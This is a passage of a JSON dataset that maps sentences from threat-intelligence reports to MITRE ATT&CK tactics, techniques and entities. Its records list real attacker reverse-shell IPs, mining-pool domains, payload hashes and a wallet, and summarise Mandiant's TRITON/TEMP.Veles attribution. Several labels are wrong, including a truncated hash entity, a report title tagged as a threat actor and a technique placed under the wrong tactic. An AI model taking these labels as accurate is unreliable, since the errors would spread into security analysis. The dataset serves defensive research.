Deci AI (now part of NVIDIA), he focused on model optimization.", "sentence_text": "His work has resulted in reports for major companies like Google and Meta, and has been featured in Forbes and Hacker News.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s160-7947f6", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 160, "context_before": "His work has resulted in reports for major companies like Google and Meta, and has been featured in Forbes and Hacker News.", "sentence_text": "He also maintains open-source eBPF projects and explores vulnerabilities in AI frameworks and inference servers.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s161-d59a46", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 161, "context_before": "He also maintains open-source eBPF projects and explores vulnerabilities in AI frameworks and inference servers.", "sentence_text": "Related Posts\nAll\nResearch\nThe Application Attack Matrix:", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s162-7c60ac", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 162, "context_before": "Related Posts\nAll\nResearch\nThe Application Attack Matrix:", "sentence_text": "Book a Demo [FILTERED_TABLES_START]\nDescription |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s163-b366cc", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 163, "context_before": "Book a Demo [FILTERED_TABLES_START]\nDescription |", "sentence_text": "IP Address | 23.146.184.38/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s164-f8ca4a", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 164, "context_before": "IP Address | 23.146.184.38/", "sentence_text": "Reverse Shell Endpoint #1 | IP Address | 54.176.108.174/", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s165-4e58c7", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 165, "context_before": "Reverse Shell Endpoint #1 | IP Address | 54.176.108.174/", "sentence_text": "Reverse Shell Endpoint #2", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s166-60bbc2", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 166, "context_before": "Reverse Shell Endpoint #2", "sentence_text": "| IP Address | 158.247.217.90/ Reverse Shell Endpoint #3", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s167-48be8d", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 167, "context_before": "| IP Address | 158.247.217.90/ Reverse Shell Endpoint #3", "sentence_text": "| IP Address | 206.189.156.69/ Reverse Shell Endpoint #4 | Domain Name | clo4q41v1v85ed814bogstepb5jwkbxtj.oast.fun/", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1071.001", "name": "Web Protocols" } ], "procedure": "None", "entities": [ { "text": "Reverse Shell Endpoint", "start": 31, "end": 53, "label": "MalwareTool" }, { "text": "206.189.156.69", "start": 15, "end": 29, "label": "Infrastructure_Indicator" }, { "text": "clo4q41v1v85ed814bogstepb5jwkbxtj.oast.fun", "start": 73, "end": 115, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s168-1760ad", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 168, "context_before": "| IP Address | 206.189.156.69/ Reverse Shell Endpoint #4 | Domain Name | clo4q41v1v85ed814bogstepb5jwkbxtj.oast.fun/", "sentence_text": "Reverse Shell Endpoint #5 | Domain Name | bore.pub/ Mining Pool Endpoint #1 | Domain Name | xna.2miners.com/ Mining Pool Endpoint #2 | Domain Name | kryptex.network/ Mining Pool Endpoint #3 | Domain Name | zeph.kryptex.network/ Mining Pool Endpoint #4 | Domain Name | zeph.kryptex.network/ Mining Pool Endpoint #5 | Domain Name | pool.hashvault.pro/", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "Reverse Shell Endpoint and Mining Pool Endpoints", "entities": [ { "text": "bore.pub", "start": 42, "end": 50, "label": "Infrastructure_Indicator" }, { "text": "xna.2miners.com", "start": 92, "end": 107, "label": "Infrastructure_Indicator" }, { "text": "kryptex.network", "start": 149, "end": 164, "label": "Infrastructure_Indicator" }, { "text": "zeph.kryptex.network", "start": 206, "end": 226, "label": "Infrastructure_Indicator" }, { "text": "pool.hashvault.pro", "start": 330, "end": 348, "label": "Infrastructure_Indicator" }, { "text": "Reverse Shell Endpoint", "start": 0, "end": 22, "label": "MalwareTool" }, { "text": "Mining Pool Endpoint", "start": 52, "end": 72, "label": "MalwareTool" } ] }, { "uid": "mitre-89_mitre_report-p1-s169-8ba429", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 169, "context_before": "Reverse Shell Endpoint #5 | Domain Name | bore.pub/ Mining Pool Endpoint #1 | Domain Name | xna.2miners.com/ Mining Pool Endpoint #2 | Domain Name | kryptex.network/ Mining Pool Endpoint #3 | Domain Name | zeph.kryptex.network/ Mining Pool Endpoint #4 | Domain Name | zeph.kryptex.network/ Mining Pool Endpoint #5 | Domain Name | pool.hashvault.pro/", "sentence_text": "Mining Pool Endpoint #6 | Domain Name | zephyr.miningocean.org/", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "Mining Pool Endpoint #6 at zephyr.miningocean.org", "entities": [ { "text": "zephyr.miningocean.org", "start": 40, "end": 62, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s170-b91bc1", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 170, "context_before": "Mining Pool Endpoint #6 | Domain Name | zephyr.miningocean.org/", "sentence_text": "Mining Pool Endpoint #7 | Domain Name | rx.unmineable.com/ VirusTotal Reverse Shell Payload #1 | VirusTotal Hash | 98f0bf732ebae8f3ba250c02e02a0787a68039caa484e688e0391343eaf0b527", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "Mining Pool Endpoint and Reverse Shell Payload identified", "entities": [ { "text": "rx.unmineable.com", "start": 40, "end": 57, "label": "Infrastructure_Indicator" }, { "text": "VirusTotal Hash", "start": 97, "end": 112, "label": "Infrastructure_Indicator" }, { "text": "8f0bf732ebae8f3ba250c02e02a0787a68039caa484e688e0391343eaf0b527", "start": 116, "end": 179, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s171-1622ed", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 171, "context_before": "Mining Pool Endpoint #7 | Domain Name | rx.unmineable.com/ VirusTotal Reverse Shell Payload #1 | VirusTotal Hash | 98f0bf732ebae8f3ba250c02e02a0787a68039caa484e688e0391343eaf0b527", "sentence_text": "Reverse Shell Payload |", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-89_mitre_report-p1-s172-2e943e", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 172, "context_before": "Reverse Shell Payload |", "sentence_text": "MD5 Hash | f3636232ed136fed658521682f6fa9f4 Reverse Shell Payload | SHA1 Hash | 8d53ade3599ca39d9ad22d9360834514e9a6c6dc Attacker Email - found in the logs of a compromised machine | Email Address | fintagixgames[at]gmail[.]com", "relevant": "yes", "tactic": [ { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1059", "name": "Command and Scripting Interpreter" } ], "procedure": "Reverse Shell Payload hashes and Attacker Email found in the logs", "entities": [ { "text": "Reverse Shell Payload", "start": 44, "end": 65, "label": "MalwareTool" }, { "text": "MD5 Hash", "start": 0, "end": 8, "label": "Infrastructure_Indicator" }, { "text": "f3636232ed136fed658521682f6fa9f4", "start": 11, "end": 43, "label": "Infrastructure_Indicator" }, { "text": "SHA1 Hash", "start": 68, "end": 77, "label": "Infrastructure_Indicator" }, { "text": "8d53ade3599ca39d9ad22d9360834514e9a6c6dc", "start": 80, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "Attacker Email ", "start": 121, "end": 136, "label": "Infrastructure_Indicator" }, { "text": "compromised machine", "start": 161, "end": 180, "label": "Infrastructure_Indicator" }, { "text": "Email Address", "start": 183, "end": 196, "label": "Infrastructure_Indicator" }, { "text": "fintagixgames[at]gmail[.]com", "start": 199, "end": 227, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-89_mitre_report-p1-s173-6a45a3", "source": "mitre", "doc_id": "89_mitre_report", "page_number": 1, "sentence_id": 173, "context_before": "MD5 Hash | f3636232ed136fed658521682f6fa9f4 Reverse Shell Payload | SHA1 Hash | 8d53ade3599ca39d9ad22d9360834514e9a6c6dc Attacker Email - found in the logs of a compromised machine | Email Address | fintagixgames[at]gmail[.]com", "sentence_text": "Attacker Wallet Address - found in the logs of a compromised machine | ZEPHYR Wallet Address | ZEPHYR3KfKQNQrfBwHtsEWyuLn1nzXvjAraxAVBuoKrKFHn3pgtqLqX96h3sWa5kP4Y2i48a4RZnbBQoivU6dQCcFTyTHDofzW55", "relevant": "yes", "tactic": [ { "id": "TA0040", "name": "Impact" } ], "techniques": [ { "id": "T1496", "name": "Resource Hijacking" } ], "procedure": "Attacker Wallet Address found in the logs of a compromised machine", "entities": [ { "text": "ZEPHYR Wallet Address", "start": 71, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "ZEPHYR3KfKQNQrfBwHtsEWyuLn1nzXvjAraxAVBuoKrKFHn3pgtqLqX96h3sWa5kP4Y2i48a4RZnbBQoivU6dQCcFTyTHDofzW55", "start": 95, "end": 195, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-90_mitre_report-p1-s1-a099ff", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 1, "context_before": "", "sentence_text": "TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers | Mandiant | Google Cloud Blog Threat Intelligence TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers October 23, 2018 Written by: FireEye Intelligence Overview In a previous blog post we detailed the TRITON intrusion that impacted industrial control systems (ICS) at a critical infrastructure facility.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "Russian Government-Owned Lab Built Custom Intrusion Tools", "entities": [ { "text": "TRITON Attribution", "start": 0, "end": 18, "label": "ThreatActor" }, { "text": "TRITON Attackers", "start": 94, "end": 110, "label": "ThreatActor" }, { "text": "Russian Government-Owned Lab", "start": 20, "end": 48, "label": "ThreatActor" }, { "text": "Custom Intrusion Tools", "start": 229, "end": 251, "label": "MalwareTool" }, { "text": "TRITON", "start": 372, "end": 378, "label": "MalwareTool" }, { "text": "industrial control systems (ICS)", "start": 403, "end": 435, "label": "Infrastructure_Indicator" }, { "text": "critical infrastructure facility", "start": 441, "end": 473, "label": "Infrastructure_Indicator" }, { "text": "Built", "start": 61, "end": 66, "label": "Action" }, { "text": "impacted", "start": 394, "end": 402, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s2-504e8f", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 2, "context_before": "TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers | Mandiant | Google Cloud Blog Threat Intelligence TRITON Attribution: Russian Government-Owned Lab Most Likely Built Custom Intrusion Tools for TRITON Attackers October 23, 2018 Written by: FireEye Intelligence Overview In a previous blog post we detailed the TRITON intrusion that impacted industrial control systems (ICS) at a critical infrastructure facility.", "sentence_text": "We now track this activity set as TEMP.Veles.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s3-ce660b", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 3, "context_before": "We now track this activity set as TEMP.Veles.", "sentence_text": "In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "None", "entities": [ { "text": "TEMP.Veles", "start": 60, "end": 70, "label": "ThreatActor" }, { "text": "TRITON", "start": 106, "end": 112, "label": "MalwareTool" }, { "text": "linking", "start": 52, "end": 59, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s4-5a2a31", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 4, "context_before": "In this blog post we provide additional information linking TEMP.Veles and their activity surrounding the TRITON intrusion to a Russian government-owned research institute.", "sentence_text": "This person’s online activity shows significant links to CNIIHM.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s5-8dcdeb", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 5, "context_before": "This person’s online activity shows significant links to CNIIHM.", "sentence_text": "An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes, including monitoring open-source coverage of TRITON, network reconnaissance, and malicious activity in support of the TRITON intrusion.", "relevant": "yes", "tactic": [ { "id": "TA0043", "name": "Reconnaissance" }, { "id": "TA0007", "name": "Discovery" }, { "id": "TA0011", "name": "Command and Control" } ], "techniques": [ { "id": "T1590", "name": "Gather Victim Network Information" } ], "procedure": "Use an IP address to monitor open-source information, perform network reconnaissance, and support malicious intrusion activities.", "entities": [ { "text": "has been employed by TEMP.Veles for multiple purposes, including monitoring open-source coverage of TRITON, network reconnaissance, and malicious activity in support of the TRITON intrusion", "start": 35, "end": 224, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s6-962192", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 6, "context_before": "An IP address registered to CNIIHM has been employed by TEMP.Veles for multiple purposes, including monitoring open-source coverage of TRITON, network reconnaissance, and malicious activity in support of the TRITON intrusion.", "sentence_text": "Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone, where CNIIHM is located.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s7-b3c53d", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 7, "context_before": "Behavior patterns observed in TEMP.Veles activity are consistent with the Moscow time zone, where CNIIHM is located.", "sentence_text": "We judge that CNIIHM likely possesses the necessary institutional knowledge and personnel to assist in the orchestration and development of TRITON and TEMP.Veles operations.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "assist in the orchestration and development of TRITON and TEMP.Veles operations", "entities": [ { "text": "CNIIHM", "start": 14, "end": 20, "label": "ThreatActor" }, { "text": "TEMP.Veles ", "start": 151, "end": 162, "label": "ThreatActor" }, { "text": "TRITON", "start": 140, "end": 146, "label": "MalwareTool" }, { "text": "orchestration", "start": 107, "end": 120, "label": "Action" }, { "text": "development ", "start": 125, "end": 137, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s8-46b121", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 8, "context_before": "We judge that CNIIHM likely possesses the necessary institutional knowledge and personnel to assist in the orchestration and development of TRITON and TEMP.Veles operations.", "sentence_text": "While we cannot rule out the possibility that one or more CNIIHM employees could have conducted TEMP.Veles activity without their employer’s approval, the details shared in this post demonstrate that this explanation is less plausible than TEMP.Veles operating with the support of the institute.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s9-b53fd1", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 9, "context_before": "While we cannot rule out the possibility that one or more CNIIHM employees could have conducted TEMP.Veles activity without their employer’s approval, the details shared in this post demonstrate that this explanation is less plausible than TEMP.Veles operating with the support of the institute.", "sentence_text": "Detail\nMalware Testing Activity Suggests Links between TEMP.Veles and CNIIHM During our investigation of TEMP.Veles activity, we found multiple unique tools that the group deployed in the target environment.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1588.002", "name": "Tool" } ], "procedure": "deploy unique tools in target environment", "entities": [ { "text": "TEMP.Veles", "start": 55, "end": 65, "label": "ThreatActor" }, { "text": "CNIIHM", "start": 70, "end": 76, "label": "ThreatActor" }, { "text": "unique tools", "start": 144, "end": 156, "label": "MalwareTool" }, { "text": "target environment", "start": 188, "end": 206, "label": "Infrastructure_Indicator" }, { "text": "deployed", "start": 172, "end": 180, "label": "Action" }, { "text": "Malware Testing Activity ", "start": 7, "end": 32, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s10-4f6852", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 10, "context_before": "Detail\nMalware Testing Activity Suggests Links between TEMP.Veles and CNIIHM During our investigation of TEMP.Veles activity, we found multiple unique tools that the group deployed in the target environment.", "sentence_text": "Malware Testing Environment Tied to TEMP.Veles We identified a malware testing environment that we assess with high confidence was used to refine some TEMP.Veles tools.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "refine tools in a malware testing environment", "entities": [ { "text": "TEMP.Veles", "start": 36, "end": 46, "label": "ThreatActor" }, { "text": "TEMP.Veles tools", "start": 151, "end": 167, "label": "MalwareTool" }, { "text": "Malware Testing Environment ", "start": 0, "end": 28, "label": "Infrastructure_Indicator" }, { "text": "refine", "start": 139, "end": 145, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s11-5d1d7c", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 11, "context_before": "Malware Testing Environment Tied to TEMP.Veles We identified a malware testing environment that we assess with high confidence was used to refine some TEMP.Veles tools.", "sentence_text": "At times, the use of this malware testing environment correlates to in-network activities of TEMP.Veles, demonstrating direct operational support for intrusion activity.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "None", "entities": [ { "text": "TEMP.Veles", "start": 93, "end": 103, "label": "ThreatActor" }, { "text": "malware testing environment", "start": 26, "end": 53, "label": "Infrastructure_Indicator" }, { "text": "correlates to in-network activities", "start": 54, "end": 89, "label": "Action" }, { "text": "demonstrating direct operational support", "start": 105, "end": 145, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s12-e4dfcc", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 12, "context_before": "At times, the use of this malware testing environment correlates to in-network activities of TEMP.Veles, demonstrating direct operational support for intrusion activity.", "sentence_text": "Four files tested in 2014 are based on the open-source project, cryptcat.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s13-e91907", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 13, "context_before": "Four files tested in 2014 are based on the open-source project, cryptcat.", "sentence_text": "Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "modify cryptcat binaries to evade AV", "entities": [ { "text": "actor", "start": 55, "end": 60, "label": "ThreatActor" }, { "text": "cryptcat binaries", "start": 18, "end": 35, "label": "MalwareTool" }, { "text": "modified", "start": 73, "end": 81, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s14-ba8cdd", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 14, "context_before": "Analysis of these cryptcat binaries indicates that the actor continually modified them to decrease AV detection rates.", "sentence_text": "One of these files was deployed in a TEMP.Veles target’s network.", "relevant": "no", "tactic": null, "techniques": null, "procedure": null, "entities": null }, { "uid": "mitre-90_mitre_report-p1-s15-69ec26", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 15, "context_before": "One of these files was deployed in a TEMP.Veles target’s network.", "sentence_text": "The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "deploy AV-evaded tool in target network", "entities": [ { "text": "TEMP.Veles", "start": 118, "end": 128, "label": "ThreatActor" }, { "text": "deployed", "start": 79, "end": 87, "label": "Action" }, { "text": "compiled version", "start": 4, "end": 20, "label": "MalwareTool" }, { "text": "target environment", "start": 147, "end": 165, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-90_mitre_report-p1-s16-c76181", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 16, "context_before": "The compiled version with the least detections was later re-tested in 2017 and deployed less than a week later during TEMP.Veles activities in the target environment.", "sentence_text": "TEMP.Veles’ lateral movement activities used a publicly-available PowerShell-based tool, WMImplant.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" } ], "procedure": "use WMImplant for lateral movement", "entities": [ { "text": "TEMP.Veles", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "PowerShell-based tool", "start": 66, "end": 87, "label": "MalwareTool" }, { "text": "WMImplant", "start": 89, "end": 98, "label": "MalwareTool" }, { "text": "lateral movement activities", "start": 12, "end": 39, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s17-202153", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 17, "context_before": "TEMP.Veles’ lateral movement activities used a publicly-available PowerShell-based tool, WMImplant.", "sentence_text": "On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection.", "relevant": "yes", "tactic": [ { "id": "TA0005", "name": "Defense Evasion" } ], "techniques": [ { "id": "T1027", "name": "Obfuscated Files or Information" } ], "procedure": "struggle to execute tool due to AV", "entities": [ { "text": "TEMP.Veles", "start": 27, "end": 37, "label": "ThreatActor" }, { "text": "utility", "start": 64, "end": 71, "label": "MalwareTool" }, { "text": "execute", "start": 51, "end": 58, "label": "Action" }, { "text": "victim systems", "start": 84, "end": 98, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-90_mitre_report-p1-s18-ca0e29", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 18, "context_before": "On multiple dates in 2017, TEMP.Veles struggled to execute this utility on multiple victim systems, potentially due to AV detection.", "sentence_text": "Soon after, the customized utility was again evaluated in the malware testing environment.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "evaluate customized tool in testing environment", "entities": [ { "text": "utility", "start": 27, "end": 34, "label": "MalwareTool" }, { "text": "malware testing environment", "start": 62, "end": 89, "label": "Infrastructure_Indicator" }, { "text": "evaluated", "start": 45, "end": 54, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s19-df39e2", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 19, "context_before": "Soon after, the customized utility was again evaluated in the malware testing environment.", "sentence_text": "The following day, TEMP.Veles again tried the utility on a compromised system.", "relevant": "yes", "tactic": [ { "id": "TA0008", "name": "Lateral Movement" } ], "techniques": [ { "id": "T1047", "name": "Windows Management Instrumentation" } ], "procedure": "retry tool on compromised system", "entities": [ { "text": "TEMP.Veles", "start": 19, "end": 29, "label": "ThreatActor" }, { "text": "utility", "start": 46, "end": 53, "label": "MalwareTool" }, { "text": "tried", "start": 36, "end": 41, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s20-16b1df", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 20, "context_before": "The following day, TEMP.Veles again tried the utility on a compromised system.", "sentence_text": "The user’s development patterns appear to pay particular attention to AV evasion and alternative code execution techniques.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "development patterns pay attention to AV evasion and alternative code execution techniques", "entities": [ { "text": "AV evasion", "start": 70, "end": 80, "label": "Action" }, { "text": "alternative code execution techniques", "start": 85, "end": 122, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s21-0795bb", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 21, "context_before": "The user’s development patterns appear to pay particular attention to AV evasion and alternative code execution techniques.", "sentence_text": "Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software, retrofitted with code used for command and control.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "weaponize open-source software with C2", "entities": [ { "text": "TEMP.Veles", "start": 28, "end": 38, "label": "ThreatActor" }, { "text": "payloads", "start": 7, "end": 15, "label": "MalwareTool" }, { "text": "weaponized", "start": 93, "end": 103, "label": "Action" }, { "text": "retrofitted", "start": 149, "end": 160, "label": "Action" }, { "text": "legitimate open-source software", "start": 116, "end": 147, "label": "MalwareTool" } ] }, { "uid": "mitre-90_mitre_report-p1-s22-cfeb95", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 22, "context_before": "Custom payloads utilized by TEMP.Veles in investigations conducted by Mandiant are typically weaponized versions of legitimate open-source software, retrofitted with code used for command and control.", "sentence_text": "A PDB path contained in a tested file contained a string that appears to be a unique handle or user name.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587.001", "name": "Malware" } ], "procedure": "None", "entities": [ { "text": "tested file", "start": 26, "end": 37, "label": "MalwareTool" }, { "text": "PDB path", "start": 2, "end": 10, "label": "Infrastructure_Indicator" } ] }, { "uid": "mitre-90_mitre_report-p1-s23-7f9988", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 23, "context_before": "A PDB path contained in a tested file contained a string that appears to be a unique handle or user name.", "sentence_text": "This moniker is linked to a Russia-based person active in Russian information security communities since at least 2011.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "moniker is linked to a Russia-based person active in security communities", "entities": [ { "text": "Russia-based person", "start": 28, "end": 47, "label": "ThreatActor" }, { "text": "moniker", "start": 5, "end": 12, "label": "Infrastructure_Indicator" }, { "text": "linked to", "start": 16, "end": 25, "label": "Action" }, { "text": "active", "start": 48, "end": 54, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s24-c1f84f", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 24, "context_before": "This moniker is linked to a Russia-based person active in Russian information security communities since at least 2011.", "sentence_text": "The handle has been credited with vulnerability research contributions to the Russian version of Hacker Magazine (хакер).", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "credited with vulnerability research contributions", "entities": [ { "text": "The handle", "start": 0, "end": 10, "label": "ThreatActor" }, { "text": "Russian version of Hacker Magazine (хакер)", "start": 78, "end": 120, "label": "Infrastructure_Indicator" }, { "text": "credited with vulnerability research contributions", "start": 20, "end": 70, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s25-98022b", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 25, "context_before": "The handle has been credited with vulnerability research contributions to the Russian version of Hacker Magazine (хакер).", "sentence_text": "Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1587", "name": "Develop Capabilities" } ], "procedure": "None", "entities": [ { "text": "Another profile", "start": 0, "end": 15, "label": "ThreatActor" }, { "text": "handle", "start": 26, "end": 32, "label": "ThreatActor" }, { "text": "user", "start": 100, "end": 104, "label": "ThreatActor" }, { "text": "Russian social network", "start": 38, "end": 60, "label": "Infrastructure_Indicator" }, { "text": "photos", "start": 86, "end": 92, "label": "Infrastructure_Indicator" }, { "text": "shows", "start": 71, "end": 76, "label": "Action" } ] }, { "uid": "mitre-90_mitre_report-p1-s26-2412ae", "source": "mitre", "doc_id": "90_mitre_report", "page_number": 1, "sentence_id": 26, "context_before": "Another profile using the handle on a Russian social network currently shows multiple photos of the user in proximity to Moscow for the entire history of the profile.", "sentence_text": "Suspected TEMP.Veles incidents include malicious activity originating from 87.245.143.140, which is registered to CNIIHM.", "relevant": "yes", "tactic": [ { "id": "TA0042", "name": "Resource Development" } ], "techniques": [ { "id": "T1583", "name": "Acquire Infrastructure" } ], "procedure": "conduct malicious activity from CNIIHM IP", "entities": [ { "text": "TEMP.Veles", "start": 10, "end": 20, "label": "ThreatActor" }, { "text": "CNIIHM", "start": 114, "end": 120, "label": "ThreatActor" }, { "text": "87.245.143.140", "start": 75, 